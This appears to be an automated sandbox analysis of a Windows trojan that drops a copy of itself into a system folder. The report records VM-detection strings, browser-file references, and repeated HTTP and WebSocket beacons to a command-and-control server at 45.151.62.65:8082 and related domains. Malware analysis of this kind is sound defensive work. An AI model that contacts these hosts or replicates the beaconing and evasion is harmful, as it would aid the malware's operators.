Source: mmzwi.exe, 00000002.00000002.2959142621.000000C000394000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: IDEAFARM-CATCH / NetDevil trojanVMware Authentication Daemon
Source: mmzwi.exe, 00000002.00000002.2959142621.000000C000368000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: VMware Web Access
Source: gjsdk.exe, 00000000.00000002.1742065604.0000000002441000.00000040.00000001.01000000.00000005.sdmp, mmzwi.exe, 00000002.00000002.2955357792.0000000002441000.00000040.00000001.01000000.00000005.sdmp, mmzwi.exe, 00000002.00000001.1731920546.00000000024DE000.00000040.00000001.01000000.00000005.sdmp	Binary or memory string: QeMUY6J
Source: mmzwi.exe, 00000002.00000002.2959142621.000000C000394000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: VMware Authentication Daemon / IDEAFARM-CHAT
Source: gjsdk.exe, 00000000.00000002.1742065604.0000000002441000.00000040.00000001.01000000.00000005.sdmp, mmzwi.exe, 00000002.00000002.2955357792.0000000002441000.00000040.00000001.01000000.00000005.sdmp, mmzwi.exe, 00000002.00000001.1731920546.00000000024BF000.00000040.00000001.01000000.00000005.sdmp	Binary or memory string: ijfV6o2HGfS
Source: mmzwi.exe, 00000002.00000002.2959142621.000000C0002CC000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: places.sqliteplaces.sqliteClearCommError192.168.2.203192.168.2.204CloseHandleplaces.sqliteextensions.jsonConnectNamedPipeCreateDirectoryWCreateEventExWCreateEventWCreateFileWCreateHardLinkWCreateJobObjectWunsupported itemunsupported itemCreateMutexExWCreateMutexWparse error192.168.2.205CreateNamedPipeWCreatePipeCreateProcessW192.168.2.206192.168.2.207192.168.2.208AMDisbetter!DefineDosDeviceWDeleteFileWDeviceIoControlAuthenticAMDCentaurHaulsGenuineIntel192.168.2.209DuplicateHandleExitProcessFindCloseFindFirstFileWFindFirstVolumeWFindNextFileWFindNextVolumeWFindResourceWFindVolumeCloseFlushFileBuffersFlushViewOfFileFormatMessageWFreeLibraryGetCommStateGetCommTimeoutsGetCommandLineW192.168.2.210TransmetaCPUGetComputerNameW192.168.2.211192.168.2.212GetConsoleCPGetConsoleModeGenuineTMx86Geode by NSCVIA VIA VIA 192.168.2.213192.168.2.214KVMKVMKVMKVMGetDriveTypeWMicrosoft Hv192.168.2.215GetFileTimeGetFileType192.168.2.216VMwareVMwareGetFullPathNameWGetLastErrorGetLogicalDrivesGetLongPathNameWGetNamedPipeInfoGetPriorityClassGetProcAddressGetProcessIdXenVMMXenVMMbhyve bhyve GetProcessTimes192.168.2.217192.168.2.218GetStartupInfoWHygonGenuineVortex86 SoCGetStdHandleSiS SiS SiS 192.168.2.219GetTempPathWGetTickCount64192.168.2.220RiseRiseRiseGetVersionGenuine RDC192.168.2.221192.168.2.222192.168.2.223192.168.2.224192.168.2.225IsWow64ProcessIsWow64Process2LoadLibraryExW192.168.2.226192.168.2.227LoadLibraryWLoadResourceLocalAllocLocalFreeLockFileExLockResourceMapViewOfFile192.168.2.228192.168.2.229Module32FirstW192.168.2.230192.168.2.231Module32NextW192.168.2.232192.168.2.233MoveFileExWGenuineIntel192.168.2.234MoveFileWOpenEventW192.168.2.235192.168.2.236OpenMutexWOpenProcessOpenThread192.168.2.237192.168.2.238Process32FirstWProcess32NextWPulseEventPurgeComm192.168.2.239Did you mean %q?QueryDosDeviceWReadConsReadFile ,,ReadConsoleWReleaseMutexW192.168.2.240192.168.2.241RemoveDirectoryWResetEventResumeThreadSetCommBreakSetCommMask192.168.2.242192.168.2.243SetCommStateshow help]192.168.2.244SetCommTimeoutsSetConsoleCPSetConsoleMode192.168.2.245[command]192.168.2.246192.168.2.247SetDllDirectoryW[command]192.168.2.248SetEndOfFileSetEnvirSetEvent192.168.2.249SetErrorModetestdata/fuzz
Source: mmzwi.exe, 00000002.00000002.2955357792.0000000002441000.00000040.00000001.01000000.00000005.sdmp	Binary or memory string: rlogindhcpv6vmwareradiuscpanelTelnetNI FTPGophervettcpFingerSUPDUPISO-IPJargonXyplexDirectrescapZannetHassleUTMPSDUTMPCDcomscmskronkMondexulpnetISAKMPPassGogdomapwhoamiudemonrepcmdSANityAminetRepCmdSun DRMeCommAgentXnloginquotadomservsubmitentombwpagesdevicevsinetmaitrdbusboynimregCARDAXPROOFDMurrayDNS2Gohermesudt_osDBStarTabulaPEportrfx-lmoracleisi-lm3ds-lmsna-csorbixdontimekermitrrirtrrrimwmrrilwmrrifmmrrisatcentraimperacaicciwinddxroketzproximencorepsmondRADIUSMyrtlecsoft1TALNETarmadptekplsmpnjscUniSQLsearchcdfuncsdfuncNBX CCNBX AUComcamAVENUEDOCENTRECIPeCVMMONpehelpsdhelpfcmsysFutrixWusageG-TalkGROOVEBMC ARDIRGISfjmpssREFTEKlabratDeliboCECSVCnetrekAMInetTragicOLHOSTtqdataRaven1Raven2aic-npcspuniatmtcpka0wucsilkp1silkp2silkp3silkp4glishddaishiEpiconROBOERJAMCT5JAMCT6SignalZARKOVBOSCAPITB301vsixmldi-asegds_dbTL1-LVVMODEMadmindSYSOPTfg-fpsfg-gippdrncsVNSSTRWebTIESUITJDDJ ILMSAVANTPharosN1-FWPActNetDJ-ICEA1-MSCEWCTSPxdsxdmJMACT3jmevt2iRDMI2PatrolLM DtaabarsdtruecmrasadvPalaceBlockshp-scohp-scaAsylummed-cipolicysha256deleteKOI8-RKOI8-U_count^(?i)(_blue__cyan_inverthiddenfinishack:%dIgnoreUTF-16[%d]%s
Source: mmzwi.exe, 00000002.00000002.2959142621.000000C0002CC000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: gjsdk.exe, 00000000.00000002.1750980942.000002B0E4744000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: mmzwi.exe, 00000002.00000002.2966741709.000001F8FE57C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllNN

Source: C:\Users\user\Desktop\gjsdk.exe

Process information queried: ProcessInformation

Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\gjsdk.exe	Queries volume information: C:\Users\user\Desktop\gjsdk.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gjsdk.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe	Queries volume information: C:\Windows\AppReadiness\mmzwi.exe VolumeInformation	Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\gjsdk.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
45.151.62.65	c4h10o.autos	Russian Federation		25229	VOLIA-ASUA	false

Contacted Domains

Name	IP	Active
c4h10o.autos	45.151.62.65	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://45.151.62.65:8082/7FBE8Vhw_Ej3wyS05Pj-_OcuPl34HeR5tlGYDglketqIsLl6CwLCyB374ln1tVW7ajwzELAFfkyu3R5Q-hjDLQ==	false		unknown
http://45.151.62.65:8082/	false		unknown

AV Detection

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Source: gjsdk.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Networking

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49953 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49953

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.4:49730 -> 45.151.62.65:8082

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /7FBE8Vhw_Ej3wyS05Pj-_OcuPl34HeR5tlGYDglketqIsLl6CwLCyB374ln1tVW7ajwzELAFfkyu3R5Q-hjDLQ== HTTP/1.1Host: 45.151.62.65:8082User-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 45.151.62.65:8082User-Agent: Go-http-client/1.1Connection: UpgradeSec-WebSocket-Key: Mkj9i1IGcuFLi6pPiAlmsQ==Sec-WebSocket-Version: 13Upgrade: websocket
Source: global traffic	HTTP traffic detected: GET /7FBE8Vhw_Ej3wyS05Pj-_OcuPl34HeR5tlGYDglketqIsLl6CwLCyB374ln1tVW7ajwzELAFfkyu3R5Q-hjDLQ== HTTP/1.1Host: 45.151.62.65:8082User-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 45.151.62.65:8082User-Agent: Go-http-client/1.1Connection: UpgradeSec-WebSocket-Key: GF7zLiydRprawdcGTIIheg==Sec-WebSocket-Version: 13Upgrade: websocket
Source: global traffic	HTTP traffic detected: GET /7FBE8Vhw_Ej3wyS05Pj-_OcuPl34HeR5tlGYDglketqIsLl6CwLCyB374ln1tVW7ajwzELAFfkyu3R5Q-hjDLQ== HTTP/1.1Host: 45.151.62.65:8082User-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 45.151.62.65:8082User-Agent: Go-http-client/1.1Connection: UpgradeSec-WebSocket-Key: OUx2ht0WNPJoXjDZ6u3e2w==Sec-WebSocket-Version: 13Upgrade: websocket
Source: global traffic	HTTP traffic detected: GET /7FBE8Vhw_Ej3wyS05Pj-_OcuPl34HeR5tlGYDglketqIsLl6CwLCyB374ln1tVW7ajwzELAFfkyu3R5Q-hjDLQ== HTTP/1.1Host: 45.151.62.65:8082User-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 45.151.62.65:8082User-Agent: Go-http-client/1.1Connection: UpgradeSec-WebSocket-Key: iEPpNfUCMB4KPKjaL5VSPQ==Sec-WebSocket-Version: 13Upgrade: websocket
Source: global traffic	HTTP traffic detected: GET /7FBE8Vhw_Ej3wyS05Pj-_OcuPl34HeR5tlGYDglketqIsLl6CwLCyB374ln1tVW7ajwzELAFfkyu3R5Q-hjDLQ== HTTP/1.1Host: 45.151.62.65:8082User-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 45.151.62.65:8082User-Agent: Go-http-client/1.1Connection: UpgradeSec-WebSocket-Key: +Z+9VSkuyjpvQkVrx8MhxQ==Sec-WebSocket-Version: 13Upgrade: websocket
Source: global traffic	HTTP traffic detected: GET /7FBE8Vhw_Ej3wyS05Pj-_OcuPl34HeR5tlGYDglketqIsLl6CwLCyB374ln1tVW7ajwzELAFfkyu3R5Q-hjDLQ== HTTP/1.1Host: 45.151.62.65:8082User-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 45.151.62.65:8082User-Agent: Go-http-client/1.1Connection: UpgradeSec-WebSocket-Key: C0P5MvCyAeBMUwbVkkAe/w==Sec-WebSocket-Version: 13Upgrade: websocket
Source: global traffic	HTTP traffic detected: GET /7FBE8Vhw_Ej3wyS05Pj-_OcuPl34HeR5tlGYDglketqIsLl6CwLCyB374ln1tVW7ajwzELAFfkyu3R5Q-hjDLQ== HTTP/1.1Host: 45.151.62.65:8082User-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 45.151.62.65:8082User-Agent: Go-http-client/1.1Connection: UpgradeSec-WebSocket-Key: myJxkJJ4oaSedrcwhxGnjA==Sec-WebSocket-Version: 13Upgrade: websocket
Source: global traffic	HTTP traffic detected: GET /7FBE8Vhw_Ej3wyS05Pj-_OcuPl34HeR5tlGYDglketqIsLl6CwLCyB374ln1tVW7ajwzELAFfkyu3R5Q-hjDLQ== HTTP/1.1Host: 45.151.62.65:8082User-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 45.151.62.65:8082User-Agent: Go-http-client/1.1Connection: UpgradeSec-WebSocket-Key: fiJuZ0206DDY4XC9dWnhuA==Sec-WebSocket-Version: 13Upgrade: websocket
Source: global traffic	HTTP traffic detected: GET /7FBE8Vhw_Ej3wyS05Pj-_OcuPl34HeR5tlGYDglketqIsLl6CwLCyB374ln1tVW7ajwzELAFfkyu3R5Q-hjDLQ== HTTP/1.1Host: 45.151.62.65:8082User-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 45.151.62.65:8082User-Agent: Go-http-client/1.1Connection: UpgradeSec-WebSocket-Key: 7eYFrZDFqk4ipCw7Av6AyA==Sec-WebSocket-Version: 13Upgrade: websocket
Source: global traffic	HTTP traffic detected: GET /7FBE8Vhw_Ej3wyS05Pj-_OcuPl34HeR5tlGYDglketqIsLl6CwLCyB374ln1tVW7ajwzELAFfkyu3R5Q-hjDLQ== HTTP/1.1Host: 45.151.62.65:8082User-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 45.151.62.65:8082User-Agent: Go-http-client/1.1Connection: UpgradeSec-WebSocket-Key: FH2w5nqUvChS0FqylUd82g==Sec-WebSocket-Version: 13Upgrade: websocket
Source: global traffic	HTTP traffic detected: GET /7FBE8Vhw_Ej3wyS05Pj-_OcuPl34HeR5tlGYDglketqIsLl6CwLCyB374ln1tVW7ajwzELAFfkyu3R5Q-hjDLQ== HTTP/1.1Host: 45.151.62.65:8082User-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 45.151.62.65:8082User-Agent: Go-http-client/1.1Connection: UpgradeSec-WebSocket-Key: V0fRj4PL+mkXO4y7UJYUpw==Sec-WebSocket-Version: 13Upgrade: websocket

Source: global traffic

DNS traffic detected: DNS query: c4h10o.autos

Source: mmzwi.exe, 00000002.00000002.2959142621.000000C000080000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: ftp://192.168.2.47
Source: mmzwi.exe, 00000002.00000002.2959142621.000000C000008000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://%s:%d/%sHTTP/1.1
Source: mmzwi.exe, 00000002.00000002.2959142621.000000C000394000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://%s:%d/%sbg-hi-bluebg-hi-magentabg-hi-cyanHTTP/1.1
Source: gjsdk.exe, 00000000.00000002.1747251241.000000C000300000.00000004.00001000.00020000.00000000.sdmp, mmzwi.exe, 00000002.00000002.2963616316.000000C0008C6000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://.css
Source: gjsdk.exe, 00000000.00000002.1747251241.000000C000300000.00000004.00001000.00020000.00000000.sdmp, mmzwi.exe, 00000002.00000002.2963616316.000000C0008C6000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://.jpg
Source: mmzwi.exe, 00000002.00000002.2959142621.000000C000080000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://45.151.62.65:8082/7FBE8Vhw_Ej3wyS05Pj-_OcuPl34HeR5tlGYDglketqIsLl6CwLCyB374ln1tVW7ajwzELAFfky
Source: gjsdk.exe, 00000000.00000002.1747251241.000000C000300000.00000004.00001000.00020000.00000000.sdmp, mmzwi.exe, 00000002.00000002.2963616316.000000C0008C6000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://html4/loose.dtd
Source: gjsdk.exe, 00000000.00000002.1747251241.000000C000124000.00000004.00001000.00020000.00000000.sdmp, mmzwi.exe, 00000002.00000002.2959142621.000000C0002DC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/go-sql-driver/mysql/wiki/old_passwords
Source: gjsdk.exe, 00000000.00000002.1748840323.000000C00060A000.00000004.00001000.00020000.00000000.sdmp, mmzwi.exe, 00000002.00000002.2959142621.000000C000394000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urfave/cli/blob/main/docs/CHANGELOG.md
Source: mmzwi.exe, 00000002.00000002.2959142621.000000C000222000.00000004.00001000.00020000.00000000.sdmp, mmzwi.exe, 00000002.00000002.2959142621.000000C0002DE000.00000004.00001000.00020000.00000000.sdmp, mmzwi.exe, 00000002.00000002.2959142621.000000C0000F2000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urfave/cli/blob/main/docs/CHANGELOG.md#deprecated-cli-app-action-signature
Source: gjsdk.exe, 00000000.00000002.1747251241.000000C000110000.00000004.00001000.00020000.00000000.sdmp, mmzwi.exe, 00000002.00000002.2959142621.000000C0002DE000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urfave/cli/blob/main/docs/CHANGELOG.md#deprecated-cli-app-action-signatureNAME:
Source: mmzwi.exe, 00000002.00000002.2959142621.000000C0000F2000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urfave/cli/blob/main/docs/CHANGELOG.md#deprecated-cli-app-action-signatureeyJhbGc
Source: mmzwi.exe, 00000002.00000002.2959142621.000000C000394000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urfave/cli/blob/main/docs/CHANGELOG.mdMust
Source: gjsdk.exe, 00000000.00000002.1748840323.000000C00060A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urfave/cli/blob/main/docs/CHANGELOG.mdThe
Source: mmzwi.exe, 00000002.00000002.2963616316.000000C0008AE000.00000004.00001000.00020000.00000000.sdmp, mmzwi.exe, 00000002.00000002.2959142621.000000C000162000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://lockn1t3.xyz
Source: mmzwi.exe, 00000002.00000002.2962140246.000000C0005D2000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://lockn1t3.xyz--09AZ__azMMZWIODFMQ2GGOJRGRTGIM3GMY4TOYRVHBQTQZRSMZRDQNLEMVSWOZLDNNXQ
Source: mmzwi.exe, 00000002.00000002.2959142621.000000C000162000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://lockn1t3.xyz00:11:22:33:44:5500:11:22:33:44:5500:11:22:33:44:5500:11:22:33:44:5500:11:22:33:
Source: gjsdk.exe, 00000000.00000002.1748840323.000000C0005D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://lockn1t3.xyzMMZWIODFMQ2GGOJRGRTGIM3GMY4TOYRVHBQTQZRSMZRDQNLEMVSWOZLDNNXQMMZWIODFMQ2GGOJRGRTG
Source: mmzwi.exe, 00000002.00000002.2963616316.000000C000904000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://lockn1t3.xyzocelot.jython27.xyztiger.jython27.xyz00:11:22:33:44:55cecreate
Source: gjsdk.exe, 00000000.00000002.1748840323.000000C0005D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://lockn1t3.xyzsizeof(rtype)

Creates files inside the system directory

Source: C:\Users\user\Desktop\gjsdk.exe	File created: C:\Windows\AppReadiness\.840809828.tmp			Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe	File created: C:\Windows\AppReadiness\.209553492.tmp			Jump to behavior

Source: classification engine

Classification label: mal52.troj.evad.winEXE@4/0@1/1

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7508:120:WilError_03

Source: C:\Users\user\Desktop\gjsdk.exe	File opened: C:\Windows\system32\43cf6327ee4e9a51c1f22496118c7b5e2d1b5bb7f55e4e915b3b63d138789748AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA			Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe	File opened: C:\Windows\system32\43d042447d465d96d1e34aed23508a3def79fdfb21cfe1f197319fae4deb3fb0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA			Jump to behavior

Source: C:\Users\user\Desktop\gjsdk.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: gjsdk.exe, 00000000.00000002.1747251241.000000C0002CA000.00000004.00001000.00020000.00000000.sdmp, mmzwi.exe, 00000002.00000002.2959142621.000000C0002AC000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: gjsdk.exe, 00000000.00000002.1747251241.000000C0002CA000.00000004.00001000.00020000.00000000.sdmp, mmzwi.exe, 00000002.00000002.2959142621.000000C0002AC000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: gjsdk.exe, 00000000.00000002.1747251241.000000C0002CA000.00000004.00001000.00020000.00000000.sdmp, mmzwi.exe, 00000002.00000002.2959142621.000000C0002AC000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: gjsdk.exe, 00000000.00000002.1747251241.000000C0002CA000.00000004.00001000.00020000.00000000.sdmp, mmzwi.exe, 00000002.00000002.2959142621.000000C0002AC000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);

Source: C:\Users\user\Desktop\gjsdk.exe

File read: C:\Users\user\Desktop\gjsdk.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\gjsdk.exe "C:\Users\user\Desktop\gjsdk.exe"
Source: C:\Users\user\Desktop\gjsdk.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\AppReadiness\mmzwi.exe C:\Windows\AppReadiness\mmzwi.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

Source: C:\Users\user\Desktop\gjsdk.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\gjsdk.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\gjsdk.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\gjsdk.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
